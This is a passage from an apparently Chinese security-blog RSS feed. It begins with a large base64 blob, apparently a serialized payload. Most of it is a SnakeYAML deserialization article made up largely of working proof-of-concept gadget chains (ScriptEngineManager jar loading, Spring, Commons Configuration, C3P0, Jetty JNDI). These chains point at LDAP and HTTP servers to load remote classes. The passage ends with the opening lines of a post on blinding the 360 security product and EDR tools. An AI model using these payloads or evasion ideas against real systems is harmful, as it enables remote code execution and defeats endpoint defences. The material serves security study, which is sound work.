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 },1048576]]\n&#34;</span>;</span></code><code><span class="code-snippet_outer">        Yaml yaml = <span class="code-snippet__keyword">new</span> Yaml();</span></code><code><span class="code-snippet_outer">        yaml.load(payload);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><p><span style="font-size: 15px;"><span style="font-size: 15px;letter-spacing: 0.034em;">写入本地之后就可以通过</span><span style="font-size: 15px;letter-spacing: 0.034em;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">ScriptEngineManager</span><span style="font-size: 15px;letter-spacing: 0.034em;">方式进行本地读取了</span></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cs"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">class</span> <span class="code-snippet__title">SnakeYaml</span> {</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">static</span> <span class="code-snippet__keyword">void</span> <span class="code-snippet__title">main</span>(<span class="code-snippet__params">String[] args</span>)</span> {</span></code><code><span class="code-snippet_outer">        String payload = <span class="code-snippet__string">&#34;!!javax.script.ScriptEngineManager [\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;  !!java.net.URLClassLoader [[\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;    !!java.net.URL [\&#34;file:///yaml-payload.jar\&#34;]\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;  ]]\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;]&#34;</span>;</span></code><code><span class="code-snippet_outer">        Yaml yaml = <span class="code-snippet__keyword">new</span> Yaml();</span></code><code><span class="code-snippet_outer">        yaml.load(payload);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><p><span style="font-size: 15px;"><span style="font-size: 15px;letter-spacing: 0.034em;">整体思路其实就是一套组合拳，核心利用链还是前面的<span style="color: rgb(255, 0, 1);font-size: 15px;letter-spacing: 0.51px;text-wrap: wrap;background-color: rgb(253, 238, 238);">ScriptEngineManager</span>。</span></span></p><p><br/></p><p><br/></p><p><span style="font-size: 15px;letter-spacing: 0.51px;"><br/></span></p><p><strong><span style="letter-spacing: 0.51px;font-size: 20px;">Other Gadgets</span></strong></p><p><span style="letter-spacing: 0.51px;font-size: 15px;">以下利用链来自于Sentiment师傅文章。</span></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;PDWR-1677929137213&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;0jpg-1677929137025&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;Spring PropertyPathFactoryBean&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;5Z9C-1677929137028&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;hQ8m-1677929137027&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;需要有spring依赖&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;font-size: 18px;">Spring PropertyPathFactoryBean</span></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;RBfG-1677929137078&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;iqOB-1677929137077&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;依赖&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;}]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;font-size: 16px;">依赖</span></p></article><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="xml"><code><span class="code-snippet_outer"><span class="code-snippet__tag">&lt;<span class="code-snippet__name">dependency</span>&gt;</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__tag">&lt;<span class="code-snippet__name">groupId</span>&gt;</span>org.springframework<span class="code-snippet__tag">&lt;/<span class="code-snippet__name">groupId</span>&gt;</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__tag">&lt;<span class="code-snippet__name">artifactId</span>&gt;</span>spring-beans<span class="code-snippet__tag">&lt;/<span class="code-snippet__name">artifactId</span>&gt;</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__tag">&lt;<span class="code-snippet__name">version</span>&gt;</span>5.3.23<span class="code-snippet__tag">&lt;/<span class="code-snippet__name">version</span>&gt;</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__tag">&lt;/<span class="code-snippet__name">dependency</span>&gt;</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__tag">&lt;<span class="code-snippet__name">dependency</span>&gt;</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__tag">&lt;<span class="code-snippet__name">groupId</span>&gt;</span>org.springframework<span class="code-snippet__tag">&lt;/<span class="code-snippet__name">groupId</span>&gt;</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__tag">&lt;<span class="code-snippet__name">artifactId</span>&gt;</span>spring-context<span class="code-snippet__tag">&lt;/<span class="code-snippet__name">artifactId</span>&gt;</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__tag">&lt;<span class="code-snippet__name">version</span>&gt;</span>5.3.23<span class="code-snippet__tag">&lt;/<span class="code-snippet__name">version</span>&gt;</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__tag">&lt;/<span class="code-snippet__name">dependency</span>&gt;</span></span></code></pre></section><p><strong><span style="font-size: 16px;">POC</span></strong></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="typescript"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">static</span> <span class="code-snippet__built_in">void</span> main(<span class="code-snippet__built_in">String</span>[] args) throws <span class="code-snippet__built_in">Error</span> ,Exception{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">String</span> poc = <span class="code-snippet__string">&#34;!!javax.management.BadAttributeValueExpException [!!org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding [\&#34;foo\&#34;,!!javax.naming.Reference [foo, \&#34;Exec\&#34;, \&#34;<a href="http://localhost:7777/\" target="_blank">http://localhost:7777/\</a>&#34;],!!org.apache.xbean.naming.context.WritableContext []]]&#34;</span>;</span></code><code><span class="code-snippet_outer">    Yaml yaml = <span class="code-snippet__keyword">new</span> Yaml();</span></code><code><span class="code-snippet_outer">    yaml.load(poc);</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;77tK-1677929137215&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;level&#34;:&#34;h3&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;fva8-1677929137106&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;Apache Commons Configuration&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;5OYi-1677929137110&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;QCLP-1677929137109&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;依赖&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;}]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;font-size: 18px;">Apache Commons Configuration</span></p><p><span style="font-weight: bold;font-size: 16px;">依赖</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="xml"><code><span class="code-snippet_outer"><span class="code-snippet__tag">&lt;<span class="code-snippet__name">dependency</span>&gt;</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__tag">&lt;<span class="code-snippet__name">groupId</span>&gt;</span>commons-configuration<span class="code-snippet__tag">&lt;/<span class="code-snippet__name">groupId</span>&gt;</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__tag">&lt;<span class="code-snippet__name">artifactId</span>&gt;</span>commons-configuration<span class="code-snippet__tag">&lt;/<span class="code-snippet__name">artifactId</span>&gt;</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__tag">&lt;<span class="code-snippet__name">version</span>&gt;</span>1.10<span class="code-snippet__tag">&lt;/<span class="code-snippet__name">version</span>&gt;</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__tag">&lt;/<span class="code-snippet__name">dependency</span>&gt;</span></span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;yikg-1677929137125&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;9KVX-1677929137124&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;POC&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 16px;"><strong>POC</strong></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="typescript"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">static</span> <span class="code-snippet__built_in">void</span> main(<span class="code-snippet__built_in">String</span>[] args) throws <span class="code-snippet__built_in">Error</span> ,Exception{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">String</span> poc = <span class="code-snippet__string">&#34;\n&#34;</span> +</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;    ? !!org.apache.commons.configuration.ConfigurationMap [!!org.apache.commons.configuration.JNDIConfiguration [!!javax.naming.InitialContext [], \&#34;ldap://localhost:9999/Execs\&#34;]]&#34;</span>;</span></code><code><span class="code-snippet_outer">    Yaml yaml = <span class="code-snippet__keyword">new</span> Yaml();</span></code><code><span class="code-snippet_outer">    yaml.load(poc);</span></code><code><span class="code-snippet_outer">}</span></code></pre></section></article><p><br/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;FibF-1677929137216&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;JsHe-1677929137141&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;C3P0 JndiRefForwardingDataSource&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:22}]}]}]}]"><p><span style="font-weight: bold;font-size: 18px;">C3P0 JndiRefForwardingDataSource</span></p></article><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="typescript"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">static</span> <span class="code-snippet__built_in">void</span> main(<span class="code-snippet__built_in">String</span>[] args) throws <span class="code-snippet__built_in">Error</span> ,Exception{</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__built_in">String</span> poc = <span class="code-snippet__string">&#34;!!com.mchange.v2.c3p0.JndiRefForwardingDataSource\n&#34;</span> +</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;  jndiName: \&#34;ldap://localhost:9999/Exec\&#34;\n&#34;</span> +</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;  loginTimeout: 0&#34;</span>;</span></code><code><span class="code-snippet_outer">    Yaml yaml = <span class="code-snippet__keyword">new</span> Yaml();</span></code><code><span class="code-snippet_outer">    yaml.load(poc);</span></code><code><span class="code-snippet_outer">}</span></code></pre></section></article><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;fQOa-1677929137217&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;Nyy2-1677929137160&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;Resource&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:22}]}]}]}]"><p><span style="font-weight: bold;font-size: 18px;">Resource</span></p><p><strong><span style="font-size: 16px;">依赖</span></strong></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="xml"><code><span class="code-snippet_outer">&lt;dependency&gt;</span></code><code><span class="code-snippet_outer">    &lt;groupId&gt;org.eclipse.jetty&lt;/groupId&gt;</span></code><code><span class="code-snippet_outer">    &lt;artifactId&gt;jetty-jndi&lt;/artifactId&gt;</span></code><code><span class="code-snippet_outer">    &lt;version&gt;9.4.8.v20171121&lt;/version&gt;</span></code><code><span class="code-snippet_outer">&lt;/dependency&gt;</span></code><code><span class="code-snippet_outer">&lt;dependency&gt;</span></code><code><span class="code-snippet_outer">    &lt;groupId&gt;org.eclipse.jetty&lt;/groupId&gt;</span></code><code><span class="code-snippet_outer">    &lt;artifactId&gt;jetty-plus&lt;/artifactId&gt;</span></code><code><span class="code-snippet_outer">    &lt;version&gt;9.4.8.v20171121&lt;/version&gt;</span></code><code><span class="code-snippet_outer">&lt;/dependency&gt;</span></code><code><span class="code-snippet_outer">&lt;dependency&gt;</span></code><code><span class="code-snippet_outer">    &lt;groupId&gt;org.eclipse.jetty&lt;/groupId&gt;</span></code><code><span class="code-snippet_outer">    &lt;artifactId&gt;jetty-util&lt;/artifactId&gt;</span></code><code><span class="code-snippet_outer">    &lt;version&gt;9.4.8.v20171121&lt;/version&gt;</span></code><code><span class="code-snippet_outer">&lt;/dependency&gt;<span style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;TDki-1677929137198&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;mgCZ-1677929137197&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;POC&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><strong><span style="font-size: 16px;">POC</span></strong></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="typescript"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">static</span> <span class="code-snippet__built_in">void</span> main(<span class="code-snippet__built_in">String</span>[] args) throws <span class="code-snippet__built_in">Error</span> ,Exception{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">String</span> poc = <span class="code-snippet__string">&#34;[!!org.eclipse.jetty.plus.jndi.Resource [\&#34;__/obj\&#34;, !!javax.naming.Reference [\&#34;foo\&#34;, \&#34;Exec\&#34;, \&#34;<a href="http://localhost:7777/\" target="_blank">http://localhost:7777/\</a>&#34;]], !!org.eclipse.jetty.plus.jndi.Resource [\&#34;obj/test\&#34;, !!java.lang.Object []]]\n&#34;</span>;</span></code><code><span class="code-snippet_outer">    Yaml yaml = <span class="code-snippet__keyword">new</span> Yaml();</span></code><code><span class="code-snippet_outer">    yaml.load(poc);</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><p><strong><span style="font-size: 18px;">其它可能切入点</span></strong></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="css"><code><span class="code-snippet_outer"><span class="code-snippet__selector-tag">Context</span>接口子类</span></code><code><span class="code-snippet_outer"><span class="code-snippet__selector-tag">DataSource</span>接口子类</span></code><code><span class="code-snippet_outer"><span class="code-snippet__selector-tag">javax</span><span class="code-snippet__selector-class">.naming</span><span class="code-snippet__selector-class">.spi</span><span class="code-snippet__selector-class">.ObjectFactory</span>子类</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__selector-tag">com</span><span class="code-snippet__selector-class">.sun</span><span class="code-snippet__selector-class">.jndi</span><span class="code-snippet__selector-class">.ldap</span><span class="code-snippet__selector-class">.LdapReferralContext</span><span class="code-snippet__selector-id">#LdapReferralContext</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__selector-tag">com</span><span class="code-snippet__selector-class">.sun</span><span class="code-snippet__selector-class">.jndi</span><span class="code-snippet__selector-class">.ldap</span><span class="code-snippet__selector-class">.LdapCtx</span><span class="code-snippet__selector-id">#LdapCtx</span>(<span class="code-snippet__selector-tag">java</span><span class="code-snippet__selector-class">.lang</span><span class="code-snippet__selector-class">.String</span>, <span class="code-snippet__selector-tag">java</span><span class="code-snippet__selector-class">.lang</span><span class="code-snippet__selector-class">.String</span>, <span class="code-snippet__selector-tag">int</span>, <span class="code-snippet__selector-tag">java</span><span class="code-snippet__selector-class">.util</span><span class="code-snippet__selector-class">.Hashtable</span>&lt;?,?&gt;, <span class="code-snippet__selector-tag">boolean</span>)</span></code><code><span class="code-snippet_outer"><span class="code-snippet__selector-tag">javax</span><span class="code-snippet__selector-class">.naming</span><span class="code-snippet__selector-class">.ldap</span><span class="code-snippet__selector-class">.InitialLdapContext</span><span class="code-snippet__selector-id">#InitialLdapContext</span>(<span class="code-snippet__selector-tag">java</span><span class="code-snippet__selector-class">.util</span><span class="code-snippet__selector-class">.Hashtable</span>&lt;?,?&gt;, <span class="code-snippet__selector-tag">javax</span><span class="code-snippet__selector-class">.naming</span><span class="code-snippet__selector-class">.ldap</span><span class="code-snippet__selector-class">.Control</span><span class="code-snippet__selector-attr">[]</span>)</span></code><code><span class="code-snippet_outer"><span class="code-snippet__selector-tag">com</span><span class="code-snippet__selector-class">.sun</span><span class="code-snippet__selector-class">.jndi</span><span class="code-snippet__selector-class">.cosnaming</span><span class="code-snippet__selector-class">.CNCtx</span><span class="code-snippet__selector-id">#CNCtx</span>(<span class="code-snippet__selector-tag">java</span><span class="code-snippet__selector-class">.util</span><span class="code-snippet__selector-class">.Hashtable</span>&lt;?,?&gt;)</span></code><code><span class="code-snippet_outer"><span class="code-snippet__selector-tag">com</span><span class="code-snippet__selector-class">.sun</span><span class="code-snippet__selector-class">.jndi</span><span class="code-snippet__selector-class">.rmi</span><span class="code-snippet__selector-class">.registry</span><span class="code-snippet__selector-class">.RegistryContext</span><span class="code-snippet__selector-id">#RegistryContext</span>(<span class="code-snippet__selector-tag">java</span><span class="code-snippet__selector-class">.lang</span><span class="code-snippet__selector-class">.String</span>, <span class="code-snippet__selector-tag">int</span>, <span class="code-snippet__selector-tag">java</span><span class="code-snippet__selector-class">.util</span><span class="code-snippet__selector-class">.Hashtable</span>&lt;?,?&gt;)</span></code></pre></section></article><p><br/></p><p><br/></p></article></article><p><br/></p><article><p><span style="font-weight: bold;font-size: 20px;">参考</span></p><p><span style="color: rgb(0, 56, 132);font-size: 15px;">总结使用SnakeYAML解析与序列化YAML相关__小鱼塘的博客-CSDN博客_snakeyaml用法</span></p><p><span style="color: rgb(0, 56, 132);font-size: 15px;">Java安全之SnakeYaml反序列化分析 - nice_0e3 - 博客园</span></p><p><span style="color: rgb(0, 56, 132);font-size: 15px;">Java SnakeYaml反序列化漏洞 | s1mple</span></p><p><span style="color: rgb(0, 56, 132);font-size: 15px;">Java SnakeYaml反序列化学习 - R0ser1 - 博客园</span></p><p><span style="color: rgb(0, 56, 132);font-size: 15px;">Java常用机制 - SPI机制详解 | Java 全栈知识体系</span></p><p><span style="color: rgb(3, 102, 214);font-size: 15px;">Java安全之SnakeYaml反序列化分析 - 跳跳糖</span></p><p><span style="color: rgb(0, 56, 132);font-size: 15px;">Java SnakeYaml反序列化 · BlBana&#39;s BlackHouse</span></p><p><span style="color: rgb(3, 102, 214);font-size: 15px;">SnakeYaml反序列化及不出网利用</span></p><p><span style="color: rgb(3, 102, 214);font-size: 15px;">Java安全之SnakeYaml反序列化分析</span></p><p><span style="color: rgb(3, 102, 214);font-size: 15px;">Java-SnakeYaml反序列化漏洞</span></p><p><span style="text-decoration: none;color: rgb(3, 102, 214);font-size: 15px;">理解的Java中SPI机制</span></p></article></article></article></article></article></article></article></article></article></article></article></article></article></article></article><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484038">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=251549bd&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484038%26idx%3D1%26sn%3De27947ee4f359e33ad45fbea06c555fd%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 06 Sep 2023 02:19:00 +0800</pubDate>
    </item>
    <item>
      <title>Bypass360核晶_致盲edr</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247483964&amp;idx=1&amp;sn=b8fa3f291accf6a7529059f764279892</link>
      <description>点进问题反馈，搞⼀搞信息收集。⼈家都说了开了虚拟化相关的软件将限制核晶发挥。那我们就挖⼀些相关软件进⾏利⽤测</description>
      <content:encoded><![CDATA[<p>
原创 <span>41group-Se1fx0</span> <span>2023-08-31 16:10</span> <span style="display: inline-block;">安徽</span>
</p>

<p>点进问题反馈，搞⼀搞信息收集。⼈家都说了开了虚拟化相关的软件将限制核晶发挥。那我们就挖⼀些相关软件进⾏利⽤测</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=57289de7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AK5MuUVOIjrgsddb5hJuNEQ0npMcibcI7sEE0OpNS1jzAoelVTgpFqvQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6287037037037037" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=7274ad06&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AMFjQL0gbxzdtMsV7cDtF4npt6sKjpmyibUGQTEFibib1yD9guSl8ia73CQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">点进问题反馈，搞⼀搞信息收集。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5592592592592592" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=4557f8c8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7ANWxvu4IHLfNTmoSHOSrhHZ6GJCtpib6U3sbX4J75GA8X0m1icTwC9Hsw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">⼈家都说了开了虚拟化相关的软件将限制核晶发挥。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5009259259259259" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=d05cd92e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7Atk7JMaZ0Uo5W9ofNjABricneQc0GCvTk0WrvJ0vSWib5uFibNjibbxFEpg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">那我们就挖⼀些相关软件进⾏利⽤测试。</span></p><p><span 